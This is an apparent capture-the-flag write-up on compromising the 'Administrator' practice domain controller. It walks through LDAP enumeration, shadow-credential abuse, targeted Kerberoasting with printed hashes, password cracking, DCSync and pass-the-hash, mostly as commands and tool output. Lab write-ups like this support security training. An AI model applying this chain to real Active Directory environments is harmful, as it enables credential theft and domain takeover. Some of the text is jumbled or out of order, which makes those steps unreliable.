.png)
2 hours ago
4 BOOK THIS SPACE FOR AD
ARTICLE ADبِسْمِ اللَّهِ وَالصَّلَاةُ وَالسَّلَامُ عَلَى رَسُولِ اللَّهِ.
FreeDom Gaza
“In this article, I explained how I exploited the machine and managed to gain control over the Domain Controller to retrieve the root flag.”
“The article contains:”
1: Ldap enum
2:- Active Directory
3: Pass the hash
4: privileges escalated
“Now, after starting the machine, we found a username and password specific to you.”
Now use nmap
sudo nmap -A -O 10.10.11.42
“We discovered multiple ports, which include:”
21/tcp open ftp Microsoft ftpd
88/tcp open kerberos-sec
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
“When attempting to exploit one of them, it couldn’t be exploited because certain services, such as the FTP protocol, are restricted to specific authorized users only.”
now use nmap
nmap -n -sV — script “ldap* and not brute” 10.10.11.42
nmap -n -sV --script "ldap* and not brute" 10.10.11.42Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-18 17:50 EST
Nmap scan report for 10.10.11.42
Host is up (0.51s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-19 05:50:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=administrator,DC=htb
| ldapServiceName: administrator.htb:dc$@ADMINISTRATOR.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=administrator,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=administrator,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=administrator,DC=htb
| namingContexts: DC=administrator,DC=htb
| namingContexts: CN=Configuration,DC=administrator,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=administrator,DC=htb
| namingContexts: DC=DomainDnsZones,DC=administrator,DC=htb
| namingContexts: DC=ForestDnsZones,DC=administrator,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 135541
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=administrator,DC=htb
| dnsHostName: dc.administrator.htb
| defaultNamingContext: DC=administrator,DC=htb
| currentTime: 20241119055107.0Z
|_ configurationNamingContext: CN=Configuration,DC=administrator,DC=htb
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=administrator,DC=htb
| ldapServiceName: administrator.htb:dc$@ADMINISTRATOR.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=administrator,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=administrator,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=administrator,DC=htb
| namingContexts: DC=administrator,DC=htb
| namingContexts: CN=Configuration,DC=administrator,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=administrator,DC=htb
| namingContexts: DC=DomainDnsZones,DC=administrator,DC=htb
| namingContexts: DC=ForestDnsZones,DC=administrator,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 135541
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=administrator,DC=htb
| dnsHostName: dc.administrator.htb
| defaultNamingContext: DC=administrator,DC=htb
| currentTime: 20241119055107.0Z
|_ configurationNamingContext: CN=Configuration,DC=administrator,DC=htb
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.30 seconds
“After conducting an analysis, we found information related to the Domain Controller.
First, what is the LDAP protocol?
The Lightweight Directory Access Protocol (LDAP) is a protocol used to access and manage directory information over a network. It is commonly used in Active Directory environments to query, search, and modify data in directory services. LDAP operates over TCP/IP and facilitates authentication, authorization, and directory information retrieval, making it a critical component in managing network resources and permissions.”
“Now that we understand the previous information, it’s time to exploit it.
Alright, we will execute the following command to uncover more hidden details:”
sudo crackmapexec smb 10.10.11.42 -u Olivia -p 'ichliebedich' --shares“After using the command, we discovered information or directories related to the file-sharing protocol.”
“We will use the command to check whether the user has access to WinRM, which is a protocol used for remote management and automation in Windows environments.”
winrm (windows Remote management ) by default winrm listens on
tcp port 5985 and 5986 tcp traffic
netexec winrm 10.10.11.42 -u olivia -p ichliebedich
use tools Evil winrm
Now is the time to gather information about the devices and users using the BloodHound tool.
Now, to gather usernames, we will use the **rpcclient** tool.
open BloodHound
As we saw in Bloodhound, the user olivia has GenericAll permissions on the user michael.
Add the msDs-KeyCredentialLink attribute to the michael user and obtain a pfx file and file password.
┌──(dega㉿└─$ python3 pywhisker.py -d "administrator.htb" -u "olivia" -p 'ichliebedich' --target "michael" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Michael Williams,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: f64082c5-c544-13c2-f448-0af02e13c155
[*] Updating the msDS-KeyCredentialLink attribute of michael
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: YQICVajS.pfx
[*] Must be used with password: LPPilQjsYfcOEsND0Kt6
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Get the TGT of user michael.
1. Ticket Granting Ticket (TGT) “This ticket is requested to the user to be authenticated to the TGS authentication ticket to enter a particular service in the domain means that the user must have a TGT ticket and here the role of TGS makes sure that the information is correct or not”
┌──(dega㉿sudo python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'olivia' -p ichliebedich
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (michael)
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$726c9e93c41b5d1e919a24daf817c667$895a074cb3f8d78f6fcf40270ec3afd1511c2ae72e105c5cee1de3cb1fedec886eb844174fe4ad03f59771d670b9bfa0ad4322ef1c876c1848ad56d9191a26b7410d159c531da70c1386a0a75da3233099e9d494165cf6558bb864a21f0597a277b2defa3691c36d2da9f074a3d489ce6d484f4b14b304e1ca34ef1c001c4c968c0260c52fdc78e2d348e038df8b6a3f9c1a0ae603f9ae75abaa29c6cf84c04e85681ef296c07282de0406a60e33f22d0e3be10ed0da440162c4850ee8fae21a664c27e39b5f7e2205d59f22d0a178fc322b1a2783d9476c3e89289e45189319ac3e53443e364cefeb7b4d2f545dc35d5f32456fa4df192f77d94007bf5298e868d3398ae0dadcf2b09667ad73bdb85d5a9e81fc39718c9b0c6fbcec8bdc929c7135dfa9be820c009d470985f48c700bb30ff9f60176296781209efa65a424cb7d1da49a26a38d87e302f39517d4c4f95b9430bab792064a46a7508125343779abdcf1cec8a25dc3945a45b7de8983d08e073f00f80dc0bf0652548eec87252a0852e391b6ec8055ff7d4b78535f80c10e8780b57150a4148abfb7e3345699e2e6a70e4d16272d3eab6057c12dd2bc1d081868408545c73b511786e8c6da07a4202c8087929a38d0a8e4e0694831457e68e0379689492a11ccc4d7735a07e93a1dda27ac42177453d8a0add09d79b9b1f50b68e673ac95dab793dbf0ca7d407ec4ffb95301b464cd8e093a139f35016eb017157b43f97920f265348c60815f0b1e356481a00cf9d7208339326c8c3ed9871692dd7f0162a9e25683605a907eb817e7f372b2cadd1ef01b16ec61b3bbeac257ecff35120d6cb8291ecfcedfba7471321afcc581fde6d62be5b06fb7f12c78cb6e648a0abf570b815c8de3df0412ccd1720dab13e9788c68d6731d343bcb05b83254e624a5e73d87b7ee10b52a2b859682b38ff3df227c6c6c92f9bd2198f466479ced5ea13be5c5f71150e6c97e8e6e0c14a08326612a87e197f94825d54ffad259be36906eb0c5a97148d543e4cd4d1f28deb610df8bb592237db35ed5f34e3664674102308a6caa7c558ba15b19b9e91cabc4d5f510b36da1aa063819c877c1674c8d6d965b672d679726c159db201655bc2c343194436e96da5a5c66088d4012d7ac5c08c8c11f4cf82d06c027fac0871974b6b41eafc4b60476a5c33a9b4270d8716c1357a8d9727b47f16a38fe97c7d3e4568ada75de9bd8dfbceabd33c1f0dc61ec1838d7f282e8bb0cb5f6bccf064cec281e9b165021c24dc19891d7a3bf4df8573558cb41d1db78b65635d75103f566381487d14d43a800fb2c884d8cd9c0d5e32c0ab6d56b842420562758f29b9dbbff9ab09b026a93aa75275572fdfa8a1936650526f37819facf8cab53e9c3b1ef759b5da0f5b287c6561fe9dbb23a9a8ca7a11a328ab18870992b6ec0967f81aefe6484312e96b8f19c85b494c516203a0443480e1511d82cc0020906fa1e4f822c78d24a2336134064c8a7260200926d73e6
[VERBOSE] SPN removed successfully for (michael)
net user michael Password123! /DOMAIN
Check bloodhound, user michael has the ForceChangePassword permission for user benjamin, so go ahead and change benjamin’s password.
The user Benjamin is authorized to access the FTP protocol.
download file
john --wordlist=/usr/share/wordlists/rockyou.txt pwsafe.hash┌──(dega㉿CyAlarm)-[~/Documents/administrator]└─$ pwsafe2john Backup.psafe3 > pwsafe.hash
┌──(dega㉿CyAlarm)-[~/Documents/administrator]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt pwsafe.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 SSE2 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho (Backu)
1g 0:00:00:00 DONE (2024-11-13 01:02) 2.040g/s 10448p/s 10448c/s 10448C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Test that emily’s password is correct and she can log in to winrm.
User emily has GenericWrite permission on user ethan. Using the attack method introduced earlier, we can obtain ethan’s TGT and crack the password successfully.
┌──(dega㉿CyAlarm)-[~/Documents/administrator]└─$pywhisker -d administrator.htb -u emily -p <emily pass> --target ethan --action "add"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 13aebc2e-a9ae-075b-e947-f1550dc6dc72
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: lWsEqVyu.pfx
[*] Must be used with password: S3MK5WBjZBhzJn6Umqvw
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
└─$targetedKerberoast.py -v -d 'administrator.htb' -u emily -p <emily pass>
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$5fa946f70a46bec63a74e142c3c36ebf$bdfda40bf8f91e77be2f3dde4434ce64cc6667f4a017571e3a082a2a7770e76786cd90fe0aec394b4c19c97dd1f115a3d668f779e801f4988de00969fe84531651bfce69d5d68e57b088cafb64a97a9262b776f9a153d686...
[VERBOSE] SPN removed successfully for (ethan)┌──(Dega㉿CyAlarm)-[~/Documents/administrator]
└─$john --wordlist=/usr/share/wordlists/rockyou.txt ethan.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<ethan pass> (?)
1g 0:00:00:00 DONE (2024-11-13 01:11) 20.00g/s 102400p/s 102400c/s 102400C/s Liverpool..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Test it and you will find that ethan’s password is correct.
┌──(dega㉿CyAlarm)-[~/Documents/administrator]└─$ netexec smb 10.10.11.42 -u ethan -p <ethan pass>
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\ethan:<ethan pass>
Using ethan, you can get the admin’s hash.
└─$ impacket-secretsdump administrator.htb/ethan:<ethan pass> 10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<admin_hash>:::
and ./evil-winrm.rb -i 10.10.11.42 -u Administrator -H <admin hash>
and cd emily profile in users cat user flag
Bengali (Bangladesh) · 
English (United States) ·